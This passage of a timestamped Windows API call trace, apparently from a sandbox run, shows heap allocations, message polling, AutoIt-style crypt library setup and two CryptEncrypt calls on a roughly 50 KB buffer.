HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.739] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.739] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.740] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0040.741] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.741] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.741] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0040.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0040.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0040.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0040.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0040.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0040.745] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0040.745] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0040.745] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.745] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.745] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.745] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0040.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0040.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.745] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.745] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.745] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.745] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.745] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0040.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.746] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.746] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.746] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.746] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0040.746] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.746] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xc43c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xc440) returned 1 [0040.746] CharLowerBuffW (in: lpsz="byte[50241]", cchLength=0xb | out: lpsz="byte[50241]") returned 0xb [0040.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.748] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.749] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.749] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x941450*, pdwDataLen=0x6ae220*=0xc43c, dwBufLen=0xc440 | out: pbData=0x941450*, pdwDataLen=0x6ae220*=0xc440) returned 1 [0040.750] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.751] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 